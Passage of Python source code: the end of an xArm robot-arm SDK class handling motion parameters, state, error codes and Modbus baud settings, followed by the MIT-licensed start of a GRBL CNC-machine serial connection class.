self._last_position[4] = kwargs.get('B') if is_radian else math.radians(kwargs.get('B'))
if 'C' in kwargs and isinstance(kwargs['C'], (int, float)):
self._last_position[5] = kwargs.get('C') if is_radian else math.radians(kwargs.get('C'))
# if 'R' in kwargs and isinstance(kwargs['R'], (int, float)):
# self._last_position[6] = kwargs.get('R')
if 'I' in kwargs and isinstance(kwargs['I'], (int, float)):
self._last_angles[0] = kwargs.get('I') if is_radian else math.radians(kwargs.get('I'))
if 'J' in kwargs and isinstance(kwargs['J'], (int, float)):
self._last_angles[1] = kwargs.get('J') if is_radian else math.radians(kwargs.get('J'))
if 'K' in kwargs and isinstance(kwargs['K'], (int, float)):
self._last_angles[2] = kwargs.get('K') if is_radian else math.radians(kwargs.get('K'))
if 'L' in kwargs and isinstance(kwargs['L'], (int, float)):
self._last_angles[3] = kwargs.get('L') if is_radian else math.radians(kwargs.get('L'))
if 'M' in kwargs and isinstance(kwargs['M'], (int, float)):
self._last_angles[4] = kwargs.get('M') if is_radian else math.radians(kwargs.get('M'))
if 'N' in kwargs and isinstance(kwargs['N'], (int, float)):
self._last_angles[5] = kwargs.get('N') if is_radian else math.radians(kwargs.get('N'))
if 'O' in kwargs and isinstance(kwargs['O'], (int, float)):
self._last_angles[6] = kwargs.get('O') if is_radian else math.radians(kwargs.get('O'))
if 'F' in kwargs and isinstance(kwargs['F'], (int, float)):
self._last_tcp_speed = kwargs.get('F')
self._last_tcp_speed = min(max(self._last_tcp_speed, self._min_tcp_speed), self._max_tcp_speed)
if 'Q' in kwargs and isinstance(kwargs['Q'], (int, float)):
self._last_tcp_acc = kwargs.get('Q')
self._last_tcp_acc = min(max(self._last_tcp_acc, self._min_tcp_acc), self._max_tcp_acc)
if 'F2' in kwargs and isinstance(kwargs['F2'], (int, float)):
self._last_joint_speed = kwargs.get('F2')
if not is_radian:
self._last_joint_speed = math.radians(self._last_joint_speed)
self._last_joint_speed = min(max(self._last_joint_speed, self._min_joint_speed), self._max_joint_speed)
if 'Q2' in kwargs and isinstance(kwargs['Q2'], (int, float)):
self._last_joint_acc = kwargs.get('Q2')
if not is_radian:
self._last_joint_acc = math.radians(self._last_joint_acc)
self._last_joint_acc = min(max(self._last_joint_acc, self._min_joint_acc), self._max_joint_acc)
if 'T' in kwargs and isinstance(kwargs['T'], (int, float)):
self._mvtime = kwargs.get('T')
if 'LIMIT_VELO' in kwargs and isinstance(kwargs['LIMIT_VELO'], (list, tuple)) \
and len(kwargs['LIMIT_VELO']) == 2 and isinstance(kwargs['LIMIT_VELO'][0], (int, float)) \
and isinstance(kwargs['LIMIT_VELO'][1], (int, float)) \
and kwargs['LIMIT_VELO'][0] <= kwargs['LIMIT_VELO'][1]:
self._min_tcp_speed, self._max_tcp_speed = kwargs.get('LIMIT_VELO')
if 'LIMIT_ACC' in kwargs and isinstance(kwargs['LIMIT_ACC'], (list, tuple)) \
and len(kwargs['LIMIT_ACC']) == 2 and isinstance(kwargs['LIMIT_ACC'][0], (int, float)) \
and isinstance(kwargs['LIMIT_ACC'][1], (int, float)) \
and kwargs['LIMIT_ACC'][0] <= kwargs['LIMIT_ACC'][1]:
self._min_tcp_acc, self._max_tcp_acc = kwargs.get('LIMIT_ACC')
def _get_params(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
if is_radian:
return {
'lastPosition': self._last_position,
'lastAngles': self._last_angles,
'mvvelo': self._last_tcp_speed,
'mvacc': self._last_tcp_acc,
'tcpJerk': self._tcp_jerk,
'jointJerk': self._joint_jerk,
'angle_mvvelo': self._last_joint_speed,
'angle_mvacc': self._last_joint_acc,
'mvtime': self._mvtime,
'LIMIT_VELO': [self._min_tcp_speed, self._max_tcp_speed],
'LIMIT_ACC': [self._min_tcp_acc, self._max_tcp_acc],
'LIMIT_ANGLE_VELO': [self._min_joint_speed, self._max_joint_speed],
'LIMIT_ANGLE_ACC': [self._min_joint_acc, self._max_joint_acc],
}
else:
return {
'lastPosition': [math.degrees(self._last_position[i]) if 2 < i < 6 else self._last_position[i] for i in range(len(self._last_position))],
'lastAngles': [math.degrees(angle) for angle in self._last_angles],
'mvvelo': round(self._last_tcp_speed),
'mvacc': round(self._last_tcp_acc),
'tcpJerk': round(self._tcp_jerk),
'jointJerk': round(math.degrees(self._joint_jerk)),
'angle_mvvelo': round(math.degrees(self._last_joint_speed)),
'angle_mvacc': round(math.degrees(self._last_joint_acc)),
'mvtime': self._mvtime,
'LIMIT_VELO': list(map(round, [self._min_tcp_speed, self._max_tcp_speed])),
'LIMIT_ACC': list(map(round, [self._min_tcp_acc, self._max_tcp_acc])),
'LIMIT_ANGLE_VELO': list(map(round, [math.degrees(self._min_joint_speed), math.degrees(self._max_joint_speed)])),
'LIMIT_ANGLE_ACC': list(map(round, [math.degrees(self._min_joint_acc), math.degrees(self._max_joint_acc)])),
}
def _check_code(self, code, is_move_cmd=False):
if is_move_cmd:
if code in [0, XCONF.UxbusState.WAR_CODE]:
if self.arm_cmd.state_is_ready:
return 0
else:
return XCONF.UxbusState.STATE_NOT_READY
else:
return code
# return 0 if code in [0, XCONF.UxbusState.WAR_CODE] and self.arm_cmd.state_is_ready else XCONF.UxbusState.STATE_NOT_READY if not self.arm_cmd.state_is_ready else code
else:
return 0 if code in [0, XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE, XCONF.UxbusState.STATE_NOT_READY] else code
def _check_mode_is_correct(self, mode, timeout=1):
if self._enable_report and self._stream_type == 'socket':
cnt = int(10 * timeout)
while cnt > 0 and self.mode != mode:
time.sleep(0.1)
cnt -= 1
if self.mode != mode:
return False
return True
def wait_until_cmdnum_lt_max(self):
if not self._check_cmdnum_limit or self._stream_type != 'socket' or not self._enable_report:
return
# if time.time() - self._last_report_time > 0.4:
# self.get_cmdnum()
if self._max_cmd_num / 2 < self.cmd_num < self._max_cmd_num:
self.get_cmdnum()
while self.cmd_num >= self._max_cmd_num:
if not self.connected:
return APIState.NOT_CONNECTED
elif self.has_error:
return APIState.HAS_ERROR
elif not self.state_is_ready:
return APIState.NOT_READY
elif self.is_stop:
return APIState.EMERGENCY_STOP
time.sleep(0.05)
@xarm_is_connected(_type='get')
def get_version(self):
ret = self.arm_cmd.get_version()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
version = ''.join(list(map(chr, ret[1:])))
self._version = version[:version.find('\0')]
return ret[0], self._version
@xarm_is_connected(_type='get')
def get_robot_sn(self):
ret = self.arm_cmd.get_robot_sn()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
robot_sn = ''.join(list(map(chr, ret[1:])))
split_inx = robot_sn.find('\0')
self._robot_sn = robot_sn[:split_inx]
control_box_sn = robot_sn[split_inx+1:]
self._control_box_sn = control_box_sn[:control_box_sn.find('\0')].strip()
self._arm_type_is_1300 = int(self._robot_sn[2:6]) >= 1300 if self._robot_sn[2:6].isdigit() else False
self._control_box_type_is_1300 = int(self._control_box_sn[2:6]) >= 1300 if self._control_box_sn[2:6].isdigit() else False
return ret[0], self._robot_sn
@xarm_is_connected(_type='get')
def check_verification(self):
ret = self.arm_cmd.check_verification()
ret[0] = self._check_code(ret[0])
return ret[0], ret[1]
@xarm_is_connected(_type='get')
def get_position(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_tcp_pose()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
self._position = [filter_invaild_number(ret[i], 6, default=self._position[i-1]) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._position[i]) if 2 < i < 6 and not is_radian else self._position[i])) for
i in range(len(self._position))]
@xarm_is_connected(_type='get')
def get_servo_angle(self, servo_id=None, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_joint_pos()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 7:
self._angles = [filter_invaild_number(ret[i], 6, default=self._angles[i-1]) for i in range(1, 8)]
if servo_id is None or servo_id == 8 or len(self._angles) < servo_id:
return ret[0], list(
map(lambda x: float('{:.6f}'.format(x if is_radian else math.degrees(x))), self._angles))
else:
return ret[0], float(
'{:.6f}'.format(self._angles[servo_id - 1] if is_radian else math.degrees(self._angles[servo_id - 1])))
@xarm_is_connected(_type='get')
def get_position_aa(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_position_aa()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
self._pose_aa = [filter_invaild_number(ret[i], 6, default=self._pose_aa[i - 1]) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._pose_aa[i]) if 2 < i < 6 and not is_radian else self._pose_aa[i]))
for i in range(len(self._pose_aa))]
@xarm_is_connected(_type='get')
def get_pose_offset(self, pose1, pose2, orient_type_in=0, orient_type_out=0, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
_pose1 = [pose1[i] if i <= 2 or is_radian else math.radians(pose1[i]) for i in range(6)]
_pose2 = [pose2[i] if i <= 2 or is_radian else math.radians(pose2[i]) for i in range(6)]
ret = self.arm_cmd.get_pose_offset(_pose1, _pose2, orient_type_in, orient_type_out)
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
def get_is_moving(self):
self.get_state()
return self._state == 1
@xarm_is_connected(_type='get')
def get_state(self):
ret = self.arm_cmd.get_state()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
# if ret[1] != self._state:
# self._state = ret[1]
# self._report_state_changed_callback()
self._state = ret[1]
self._last_update_state_time = time.time()
return ret[0], ret[1] if ret[0] == 0 else self._state
@xarm_is_connected(_type='set')
def set_state(self, state=0):
_state = self._state
ret = self.arm_cmd.set_state(state)
ret[0] = self._check_code(ret[0])
if state == 4 and ret[0] == 0:
# self._last_position[:6] = self.position
# self._last_angles = self.angles
self._sleep_finish_time = 0
# self._is_sync = False
self.get_state()
if _state != self._state:
self._report_state_changed_callback()
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[set_state], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[set_state], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> set_state({}) -> code={}, state={}'.format(state, ret[0], self._state), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_mode(self, mode=0):
ret = self.arm_cmd.set_mode(mode)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_mode({}) -> code={}'.format(mode, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='get')
def get_cmdnum(self):
ret = self.arm_cmd.get_cmdnum()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
if ret[1] != self._cmd_num:
self._report_cmdnum_changed_callback()
self._cmd_num = ret[1]
self._last_update_cmdnum_time = time.time()
return ret[0], self._cmd_num
@xarm_is_connected(_type='get')
def get_err_warn_code(self, show=False, lang='en'):
ret = self.arm_cmd.get_err_code()
lang = lang if lang == 'cn' else 'en'
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
# if ret[1] != self._error_code or ret[2] != self._warn_code:
# self._error_code, self._warn_code = ret[1:3]
# self._report_error_warn_changed_callback()
self._error_code, self._warn_code = ret[1:3]
self._last_update_err_time = time.time()
if show:
pretty_print('************* {}, {}: {} **************'.format(
'获取控制器错误警告码' if lang == 'cn' else 'GetErrorWarnCode',
'状态' if lang == 'cn' else 'Status',
ret[0]), color='light_blue')
controller_error = ControllerError(self._error_code, status=0)
controller_warn = ControllerWarn(self._warn_code, status=0)
pretty_print('* {}: {}, {}: {}'.format(
'错误码' if lang == 'cn' else 'ErrorCode',
controller_error.code,
'信息' if lang == 'cn' else 'Info',
controller_error.title[lang]),
color='red' if self._error_code != 0 else 'white')
pretty_print('* {}: {}, {}: {}'.format(
'警告码' if lang == 'cn' else 'WarnCode',
controller_warn.code,
'信息' if lang == 'cn' else 'Info',
controller_warn.title[lang]),
color='yellow' if self._warn_code != 0 else 'white')
pretty_print('*' * 50, color='light_blue')
return ret[0], ret[1:3] if ret[0] == 0 else [self._error_code, self._warn_code]
@xarm_is_connected(_type='set')
def clean_error(self):
ret = self.arm_cmd.clean_err()
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[clean_error], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[clean_error], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> clean_error -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def clean_warn(self):
ret = self.arm_cmd.clean_war()
self.log_api_info('API -> clean_warn -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_not_simulation_mode(ret=0)
def motion_enable(self, enable=True, servo_id=None):
assert servo_id is None or (isinstance(servo_id, int) and 1 <= servo_id <= 8)
if servo_id is None or servo_id == 8:
ret = self.arm_cmd.motion_en(8, int(enable))
else:
ret = self.arm_cmd.motion_en(servo_id, int(enable))
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._is_ready = bool(enable)
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[motion_enable], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[motion_enable], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> motion_enable -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
def wait_move(self, timeout=None):
if timeout is not None:
expired = time.time() + timeout + (self._sleep_finish_time if self._sleep_finish_time > time.time() else 0)
else:
expired = 0
count = 0
_, state = self.get_state()
max_cnt = 4 if _ == 0 and state == 1 else 10
while timeout is None or time.time() < expired:
if not self.connected:
self.log_api_info('wait_move, xarm is disconnect', code=APIState.NOT_CONNECTED)
return APIState.NOT_CONNECTED
if time.time() - self._last_report_time > 0.4:
self.get_state()
self.get_err_warn_code()
if self.error_code != 0:
self.log_api_info('wait_move, xarm has error, error={}'.format(self.error_code), code=APIState.HAS_ERROR)
return APIState.HAS_ERROR
# no wait in velocity mode
if self.mode in [4, 5]:
return 0
if self.is_stop:
_, state = self.get_state()
if _ != 0 or state not in [4, 5]:
time.sleep(0.02)
continue
self._sleep_finish_time = 0
self.log_api_info('wait_move, xarm is stop, state={}'.format(self.state), code=APIState.EMERGENCY_STOP)
return APIState.EMERGENCY_STOP
if time.time() < self._sleep_finish_time or self.state == 3:
time.sleep(0.02)
count = 0
continue
if self.state != 1:
count += 1
if count >= max_cnt:
_, state = self.get_state()
self.get_err_warn_code()
if _ == 0 and state != 1:
return 0
else:
count = 0
# return 0
# if count % 4 == 0:
# self.get_state()
# self.get_err_warn_code()
else:
count = 0
time.sleep(0.05)
return APIState.WAIT_FINISH_TIMEOUT
@xarm_is_connected(_type='set')
def _check_modbus_code(self, ret, length=2, only_check_code=False, host_id=XCONF.TGPIO_HOST_ID):
code = ret[0]
if self._check_code(code) == 0:
if not only_check_code:
if len(ret) < length:
return APIState.MODBUS_ERR_LENG
if ret[1] != host_id:
return APIState.HOST_ID_ERR
if code != 0:
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
code = 0
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code != 100 + host_id:
code = 0
return code
@xarm_is_connected(_type='set')
def checkset_modbus_baud(self, baudrate, check=True, host_id=XCONF.TGPIO_HOST_ID):
if check and ((host_id == XCONF.TGPIO_HOST_ID and self.modbus_baud == baudrate) or (host_id == XCONF.LINEER_TRACK_HOST_ID and self.linear_track_baud == baudrate)):
return 0
if baudrate not in self.arm_cmd.BAUDRATES:
return APIState.MODBUS_BAUD_NOT_SUPPORT
ret, cur_baud_inx = self._get_modbus_baudrate_inx(host_id=host_id)
if ret == 0:
baud_inx = self.arm_cmd.BAUDRATES.index(baudrate)
if cur_baud_inx != baud_inx:
try:
self._ignore_error = True
self._ignore_state = True if self.state not in [4, 5] else False
state = self.state
# self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.MODBUS_BAUDRATE, baud_inx)
self.arm_cmd.tgpio_addr_w16(0x1A0B, baud_inx, bid=host_id)
time.sleep(0.3)
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.SOFT_REBOOT, 1, bid=host_id)
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code == 19 or self.error_code == 28:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code == 100 + host_id:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
except Exception as e:
self._ignore_error = False
self._ignore_state = False
logger.error('checkset_modbus_baud error: {}'.format(e))
return APIState.API_EXCEPTION
self._ignore_error = False
self._ignore_state = False
ret, cur_baud_inx = self._get_modbus_baudrate_inx(host_id=host_id)
self.log_api_info('API -> checkset_modbus_baud -> code={}, baud_inx={}'.format(ret, cur_baud_inx), code=ret)
# if ret == 0 and cur_baud_inx < len(self.arm_cmd.BAUDRATES):
# self.modbus_baud = self.arm_cmd.BAUDRATES[cur_baud_inx]
if host_id == XCONF.TGPIO_HOST_ID:
return 0 if self.modbus_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
elif host_id == XCONF.LINEER_TRACK_HOST_ID:
return 0 if self.linear_track_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
else:
if ret == 0 and 0 <= cur_baud_inx < len(self.arm_cmd.BAUDRATES):
return 0 if self.arm_cmd.BAUDRATES[cur_baud_inx] == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
return APIState.MODBUS_BAUD_NOT_CORRECT
@xarm_is_connected(_type='get')
def _get_modbus_baudrate_inx(self, host_id=XCONF.TGPIO_HOST_ID):
ret = self.arm_cmd.tgpio_addr_r16(XCONF.ServoConf.MODBUS_BAUDRATE & 0x0FFF, bid=host_id)
if ret[0] in [XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE]:
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
ret[0] = 0
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code != 100 + host_id:
ret[0] = 0
if ret[0] == 0 and 0 <= ret[1] < len(self.arm_cmd.BAUDRATES):
if host_id == XCONF.TGPIO_HOST_ID:
self.modbus_baud = self.arm_cmd.BAUDRATES[ret[1]]
elif host_id == XCONF.LINEER_TRACK_HOST_ID:
self.linear_track_baud = self.arm_cmd.BAUDRATES[ret[1]]
return ret[0], ret[1]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_timeout(self, timeout):
ret = self.arm_cmd.set_modbus_timeout(timeout)
self.log_api_info('API -> set_tgpio_modbus_timeout -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_baudrate(self, baud):
code = self.checkset_modbus_baud(baud, check=False)
self.log_api_info('API -> set_tgpio_modbus_baudrate -> code={}'.format(code), code=code)
return code
@xarm_is_connected(_type='get')
def get_tgpio_modbus_baudrate(self):
code, baud_inx = self._get_modbus_baudrate_inx()
# if code == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
# self.modbus_baud = self.arm_cmd.BAUDRATES[baud_inx]
return code, self.modbus_baud
def getset_tgpio_modbus_data(self, datas, min_res_len=0, ignore_log=False):
if not self.connected:
return APIState.NOT_CONNECTED, []
ret = self.arm_cmd.tgpio_set_modbus(datas, len(datas))
ret[0] = self._check_modbus_code(ret, min_res_len + 2)
if not ignore_log:
self.log_api_info('API -> getset_tgpio_modbus_data -> code={}, response={}'.format(ret[0], ret[2:]), code=ret[0])
return ret[0], ret[2:]
@xarm_is_connected(_type='set')
def set_simulation_robot(self, on_off):
ret = self.arm_cmd.set_simulation_robot(on_off)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_simulation_robot({}) -> code={}'.format(on_off, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_pause(_type='set')
@xarm_wait_until_cmdnum_lt_max(only_wait=False)
def set_tcp_load(self, weight, center_of_gravity):
if compare_version(self.version_number, (0, 2, 0)):
_center_of_gravity = center_of_gravity
else:
_center_of_gravity = [item / 1000.0 for item in center_of_gravity]
ret = self.arm_cmd.set_tcp_load(weight, _center_of_gravity)
self.log_api_info('API -> set_tcp_load -> code={}, weight={}, center={}'.format(ret[0], weight, _center_of_gravity), code=ret[0])
return ret[0]
|
grbl.py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Jason Engman <jengman@testtech-solutions.com>
# Copyright (c) 2021 Adam Solchenberger <asolchenberger@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import re
import threading
import serial
import time
import struct
from typing import Any, Callable, Optional
from backend.managers.connection_classes.base import Connection
from backend.managers.connection_classes.const import DATATYPES
from gi.repository import Gtk, GObject, Gdk, GdkPixbuf
CNC_BUFFER_SZ = 128
class Grbl_Connection(Connection):
def __init__(self, manager: object, idx: str):
super(Grbl_Connection, self).__init__(manager, idx)
params = self.db_manager.get_rows("GrblConnectionsParams",["Port", "PendantPort", "Pollrate", "AutoConnect"], match_col="ID", match=self.id)
if not len(params):
raise KeyError("Grbl connection parameters missing in project database for ID: {}".format(self.id))
params = params[0]
self.port = params["Port"]
self.pollrate = float(params["Pollrate"])
self.auto_connect = (params["AutoConnect"])
self.settings_read_req = True # read all settings on connect
self.connection_err = False
self.connect_cmd = False
self.connection_handle = None
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
#self.poll_thread.daemon=True
self.WCO = [0,0,0]
self.state_enum = {'Disconnected':0,
'Idle': 1,
'Run':2,
'Hold:0': 3,
'Hold:1': 3.1,
'Jog':4,
'Alarm':5,
'Door:0':6,
'Door:1':6.1,
'Door:2':6.2,
'Door:3':6.3,
'Check':7,
'Home':8,
'Sleep':9}
self.tags = {
'$0': {"Value": 10, "Timestamp": 0.0, "DataType": "INT"},
'$1': {"Value": 25, "Timestamp": 0.0, "DataType": "INT"},
'$2': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$3': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$4': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$5': {"Value": 1, "Timestamp": 0.0, "DataType": "INT"},
'$6': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$10': {"Value": 1, "Timestamp": 0.0, "DataType": "INT"},
'$11': {"Value": 0.010, "Timestamp": 0.0, "DataType": "REAL"},
'$12': {"Value": 0.002, "Timestamp": 0.0, "DataType": "REAL"},
'$13': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$20': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$21': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$22': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$23': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$24': {"Value":25.000, "Timestamp": 0.0, "DataType": "REAL"},
'$25': {"Value":500.000, "Timestamp": 0.0, "DataType": "REAL"},
'$26': {"Value":250, "Timestamp": 0.0, "DataType": "INT"},
'$27': {"Value":1.000, "Timestamp": 0.0, "DataType": "REAL"},
'$30': {"Value":1000, "Timestamp": 0.0, "DataType": "INT"},
'$31': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$32': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$100': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$101': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$102': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$110': {"Value":5000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$111': {"Value":5000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$112': {"Value":1000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$120': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$121': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$122': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$130': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'$131': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'$132': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'state': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'pendant-ticks': {"Value":0, "Timestamp": 0.0, "DataType": "UDINT"},
'manual-ticks-init': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-sp-init': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'pendant-mm-rev': {"Value":10.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-X': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-Y': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-Z': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-X-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-Y-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-Z-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-X': {"Value":500, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-X': {"Value":1.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-Y': {"Value":500, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-Y': {"Value":1.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-Z': {"Value":100, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-Z': {"Value":0.2, "Timestamp": 0.0, "DataType": "REAL"},
'eu': {"Value":0, "Timestamp": 0.0, "DataType": "INT"}, # 0=mm 1=inches
'spindle-run': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'coolant': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'override-spindle': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'override-feed': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'override-rapids': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'pin-X': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-Y': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-Z': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-P': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-D': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-H': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-R': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-S': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'block-in-avail': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'chars-avail': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'spindle-speed': {"Value":0, "Timestamp": 0.0, "DataType": "REAL"},
'feedrate': {"Value":0, "Timestamp": 0.0, "DataType": "REAL"},
}
self.pendant = Pendant(self, params["PendantPort"], self.connection_manager)
self.realtime_cmd = None
self.blocks_to_send_private = [] #gcode blocks or lines to send (not threadsafe)
self.blocks_to_send = [] #gcode blocks or lines to send
self.block_lock = False
self.blocks_sent = [] #blocks that have been sent but not completed
if self.auto_connect:
self.connectDevice()
def read(self, tags):
results = {}
ts = time.time()
for tag in tags:
